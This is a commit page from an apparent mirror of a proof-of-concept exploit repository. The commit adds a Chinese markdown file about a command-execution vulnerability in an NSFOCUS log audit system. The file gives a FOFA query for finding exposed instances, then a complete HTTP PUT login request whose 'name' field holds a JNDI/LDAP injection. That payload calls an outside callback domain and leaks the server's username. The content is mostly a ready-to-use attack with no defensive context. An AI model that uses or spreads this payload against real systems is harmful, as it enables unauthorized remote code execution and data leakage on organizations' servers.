mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 绿盟日志审计系统存在命令执行漏洞.md
This commit is contained in:
parent
b11fc1abf7
commit
1781ac11ad
32
绿盟日志审计系统存在命令执行漏洞.md
Normal file
32
绿盟日志审计系统存在命令执行漏洞.md
Normal file
@ -0,0 +1,32 @@
|
||||
## 绿盟日志审计系统存在命令执行漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
"<title>{{platformName}}</title>" && icon_hash="-1566499661"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
PUT /api/v1/login HTTP/1.1
|
||||
Host:
|
||||
Connection: keep-alive
|
||||
Content-Length: 36
|
||||
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/json;charset=UTF-8
|
||||
Accept-Language: zh_CN
|
||||
sec-ch-ua-mobile: ?0
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
|
||||
sec-ch-ua-platform: "Windows"
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Dest: empty
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Cookie: JSESSIONID=C2CBDF46F7B53365D2ECE60AA645B673; sessionid=w0gr7fyrkt56tf6yc3sr0pw6mjl59txi
|
||||
|
||||
{"name":"${jndi:ldap://${sys:user.name}.a24693ffbb.ipv6.1433.eu.org}","password":"2Y4W5F5h"}
|
||||
```
|
||||
|
||||

|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user